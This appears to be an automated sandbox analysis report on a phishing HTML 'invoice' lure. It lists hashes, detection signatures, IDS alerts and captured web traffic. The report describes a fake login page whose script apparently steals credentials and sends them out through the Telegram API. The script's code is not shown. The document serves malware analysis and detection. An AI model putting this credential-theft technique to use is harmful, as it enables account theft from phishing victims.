Windows Analysis Report
Invoice_charles.mesquita_PaymentUpdate.html

Overview

General Information

Sample name: Invoice_charles.mesquita_PaymentUpdate.html
Analysis ID: 1648028
MD5: dc90cca6cc296a6750140d5ada2ae0a4
SHA1: ed093e3d9dfb92d7f1c481b17655ed8eb9aa0bdc
SHA256: 18510c0f3b951e1f348a99ef04725cb19162508a762ae3340e0ef8d251819011

Detection

HTMLPhisher
Score: 84
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
Uses the Telegram API (likely for C&C communication)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)

Classification

[Classification chart: axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; legend clean, suspicious, malicious]
  • System is w10x64_ra
  • chrome.exe (PID: 6292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Invoice_charles.mesquita_PaymentUpdate.html MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,11913174507900724838,10422298326975698631,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
0.1.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
0.2.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-25T13:48:40.312967+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.16 | 49730 | 149.154.167.220 | 443 | TCP
2025-03-25T13:48:41.153898+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.16 | 49731 | 149.154.167.220 | 443 | TCP
2025-03-25T13:49:01.143700+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.16 | 49735 | 149.154.167.220 | 443 | TCP
2025-03-25T13:49:01.890062+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.16 | 49741 | 149.154.167.220 | 443 | TCP

      Phishing

      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.0.pages.csv
      Source: Yara match | File source: 0.1.pages.csv, type: HTML
      Source: Yara match | File source: 0.2.pages.csv, type: HTML
      Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Invoice_charles.mesq... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to steal user information and credentials. The script interacts with suspicious domains, further indicating malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | Tab title: Login
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: Number of links: 0
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: Title: Login does not match URL
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: Title: Login does not match URL
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: Has password / email / username input fields
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: <input type="password" .../> found
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No favicon
      Source: https://www.quiltercheviot.com/ | HTTP Parser: No favicon
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No <meta name="author".. found
      Source: Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: No <meta name="copyright".. found
      Source: chrome.exe | Memory has grown: Private usage: 0MB later: 32MB

      Networking

      Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49730 -> 149.154.167.220:443
      Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49731 -> 149.154.167.220:443
      Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49735 -> 149.154.167.220:443
      Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49741 -> 149.154.167.220:443
      Source: unknown | DNS query: name: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/information.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/success.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /scripts/b/ai.2.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveOrigin: https://www.quiltercheviot.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/svg-sprite.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/information.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/success.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /api/message/getall/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron-white.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM
      Source: global trafficHTTP traffic detected: GET /c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=json HTTP/1.1Host: apikeys.civiccomputing.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.quiltercheviot.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2F HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliverequest-id: |f96cce968b834a4886747967c12e0e99.033472d96ff647edtraceparent: 00-f96cce968b834a4886747967c12e0e99-033472d96ff647ed-01sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/message/getall/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron-white.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2F HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z; ai_session=eZMfWWjpsv5X8Pxjs9fiCV|1742906944812|1742906944812
      Source: global trafficHTTP traffic detected: GET /c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=json HTTP/1.1Host: apikeys.civiccomputing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank
      Source: global trafficHTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
